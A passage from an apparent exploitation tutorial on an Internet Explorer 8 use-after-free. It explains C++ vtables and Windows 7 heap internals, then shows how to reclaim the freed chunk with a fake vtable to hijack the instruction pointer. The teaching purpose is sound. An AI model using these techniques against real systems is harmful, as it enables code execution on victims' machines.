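    // to service other allocation requests.
    free(chunk);

    // Use after free: 'chunk' is a dangling pointer. Dereferencing it is
    // undefined behavior - you might see stale 0x41s, someone else's data,
    // or a crash, depending on what the heap manager has done since.
    printf("%c\n", chunk[0]);
    return 0;
}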

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference, however, is that in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed from within the class itself (derived classes can access protected members, but not private ones). We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
  public:

    // This is our user defined constructor
    classOne()
    {
      cout << "Hello from the classOne constructor" << endl;
    }

    // This is our user defined destructor
    ~classOne()
    {
      cout << "Hello from the classOne destructor!" << endl;
    }

  public:
    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
  public:

    // This is our user defined constructor
    classTwo()
    {
      cout << "Hello from the classTwo constructor!" << endl;
    };

    // This is our user defined destructor
    ~classTwo()
    {
      cout << "Hello from the classTwo destructor!" << endl;
    };

  public:
    void sharedFunction()               
    {
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()
    };
};

// This is another derived/sub class
class classThree : public classOne
{
  public:

    // This is our user defined constructor
    classThree()
    {
      cout << "Hello from the classThree constructor" << endl;
    };

    // This is our user defined destructor
    ~classThree()
    {
      cout << "Hello from the classThree destructor!" << endl;
    };
  
  public:
    void sharedFunction()
    {
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()
    };
};

// Main function
int main()
{
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions
  c1->sharedFunction();
  c1_2->sharedFunction();
  c1->sharedFunction1();
  c1_2->sharedFunction1();

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for the class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Their general purpose is to allow variables to be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating pointers to classOne objects, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* c1 in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as in our case, the delete operator being invoked against one of the previously declared class objects (c1 and c1_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;
};

As you know, the first member of this struct is int var1. The same holds true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exist is that they allow a developer to prototype a function in a main class, while allowing the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested in the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, we dumped the table and saw our two virtual function addresses. We can see that program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since the destructor is not declared virtual and we delete through classOne pointers, only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to _free_dbg in ucrtbased.dll (the debug C runtime), to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.
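
To tie the walkthrough together, here is a hedged C++ rendering of what that mov/call routine is doing. The manual dispatch below assumes the x64 layout we just observed (vptr as the first field, 8-byte table slots); it is undefined behavior by the standard and is shown only to illustrate the indexing.

#include <cstdio>

// Minimal stand-ins mirroring classOne/classTwo from the earlier listing.
struct Base
{
    virtual void sharedFunction()  { puts("Base::sharedFunction"); }
    virtual void sharedFunction1() { puts("Base::sharedFunction1"); }
};

struct Derived : Base
{
    void sharedFunction()  { puts("Derived::sharedFunction"); }
    void sharedFunction1() { puts("Derived::sharedFunction1"); }
};

int main()
{
    Base* obj = new Derived();

    // What the compiler-generated call roughly lowers to on x64:
    typedef void (*vfunc_t)(Base*);
    vfunc_t* vtable = *reinterpret_cast<vfunc_t**>(obj); // mov rax, qword ptr [rcx]
    vtable[0](obj);                                      // call qword ptr [rax]      -> sharedFunction
    vtable[1](obj);                                      // call qword ptr [rax+0x8]  -> sharedFunction1

    delete obj;
    return 0;
}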

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  c1->sharedFunction();
  c1_2->sharedFunction();

  delete c1;
  delete c1_2;

  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
  c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configures WinDbg to automatically attach to and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. gflags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process: gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr - The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered that techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll!_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.
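
As a hedged sketch of that heuristic (the 18-allocation threshold as commonly described for Windows 7; exact thresholds and behavior vary across versions), activating the LFH for a given size bucket looks roughly like this:

#include <windows.h>
#include <cstdio>

int main()
{
    HANDLE heap = HeapCreate(0, 0, 0);
    if (!heap) return 1;

    // Enough consecutive same-size requests to satisfy the heuristic; after
    // that, further requests of this size are serviced by the front-end (LFH).
    for (int i = 0; i < 18; i++)
    {
        void* chunk = HeapAlloc(heap, 0, 0x68);
        printf("allocation %2d: %p\n", i, chunk);
        // Intentionally not freed - we only care about the allocation count here.
    }

    HeapDestroy(heap);
    return 0;
}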

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entirety, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting, memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap managers, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code at first as about the actual root cause, which is that the CPhraseElement’s outerText property is reset, freeing the underlying object. However, after this object has been freed, a reference to it still remains within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contain a similar proof of concept to the above. Note that although the elements described do not share the same names as the elements in the HTML, when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically to how we did earlier, to see if we can identify why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according to the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unassemble at the current instruction pointer, we can see something that is very reminiscent of the assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x10, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is a fetch of the vptr via [ecx]. ECX holds a pointer to the object, and dereferencing it loads the vptr into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (whichever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX from the memory pointed to by ECX. ECX, therefore, holds a pointer to the object’s heap chunk - the chunk that was freed. Even though the memory is in a free state, it is still pointed to by ECX, and [ecx] in this case is the vptr. It is only when we dereference the memory that we can see this chunk is actually invalid.

Moving on, take a look at the call stack, where we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class is actually handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which are simply lists of the function calls that led to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability’s title contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we would like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).
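
A hedged sketch of why the exact size matters (Windows 7 behavior as described above; newer versions randomize LFH reuse, so the same-address result is not guaranteed there):

#include <windows.h>
#include <cstdio>

int main()
{
    HANDLE heap = HeapCreate(0, 0, 0);
    if (!heap) return 1;

    // Warm up the 0x68-byte bucket so the LFH is servicing this size.
    for (int i = 0; i < 32; i++)
        HeapAlloc(heap, 0, 0x68);

    void* victim = HeapAlloc(heap, 0, 0x68);
    printf("victim      : %p\n", victim);

    // Free the chunk, then immediately request the same size again. On the
    // Windows 7 LFH (LIFO reuse), the replacement tends to land right where
    // the victim was - the same idea as reclaiming the freed CAnchorElement.
    HeapFree(heap, 0, victim);
    void* replacement = HeapAlloc(heap, 0, 0x68);
    printf("replacement : %p\n", replacement);

    HeapDestroy(heap);
    return 0;
}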

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that we can fill this freed chunk with our own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, function arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is, again, a handle to an existing heap. The second is any flags you would like to set on the heap allocation. The third, and most important for us, is the actual size of the allocation. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger take over again, we can actually see that the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!


This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see that our user-controlled data now fills the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that were previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, valid out to at least offset 0x70? What we could do is, with our primitive to control the vptr, replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create enough pointers (think of these as “fake functions”) to cover that offset, and then have the vptr we control point to the fake table.

By program design, the program execution would naturally dereference our fake virtual function table, fetch whatever is at our fake virtual function table at an offset of 0x70, and invoke it! The goal from here is to construct our own vftable and to make the entry at offset 0x70 in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!
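
As a hedged sketch of the data layout we are aiming for (assumes a 32-bit process, as on the IE8 target; the names and the 0x42424242 placeholder are illustrative, not taken from the exploit):

#include <cstdint>
#include <cstring>
#include <cstdio>

int main()
{
    // Fake "virtual function table": it only needs to be valid out to offset
    // 0x70, because the vulnerable routine performs call [vptr_target + 0x70].
    static uint32_t fakeVtable[0x74 / 4] = { 0 };
    fakeVtable[0x70 / 4] = 0x42424242; // later: the address of a stack pivot / ROP entry

    // Fake object contents: the 0x68 bytes that reclaim the freed chunk. The
    // first 4 bytes play the role of the vptr and point at fakeVtable.
    uint8_t fakeObject[0x68] = { 0 };
    uint32_t fakeVptr = (uint32_t)(uintptr_t)fakeVtable;
    memcpy(fakeObject, &fakeVptr, sizeof(fakeVptr));

    // In the exploit, this 0x68-byte blob is what the reallocation described
    // below places over the freed CAnchorElement chunk: mov eax, [ecx] picks
    // up fakeVptr, and call [eax+0x70] lands on the placeholder above.
    printf("fake vptr: 0x%08x\n", fakeVptr);
    return 0;
}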

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method simply to avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit: the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is the following: instead of just placing 0x68 bytes of raw data to fill up our heap chunk, which still results in a crash because we are not supplying pointers to anything, we can actually create a 0x68-byte array of pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is an alternative here, although it is a relatively scrutinized technique. The point of this exploit is to document use-after-free vulnerabilities, how to determine the size of a freed allocation, and how to properly fill it. This specific technique is also no longer applicable today. However, this is the beginning of my journey into learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same CElement::Doc routine we have been working in, where a virtual function is fetched from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now reclaimed this freed chunk with our user-supplied 0x68-byte allocation.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in the chunk, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the entry at offset 0x70 to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This takes the vptr in EAX, dereferences it at an offset of 0x70 to fetch a function pointer out of the virtual function table, and stores that pointer in EDX
call edx       ; The function is called

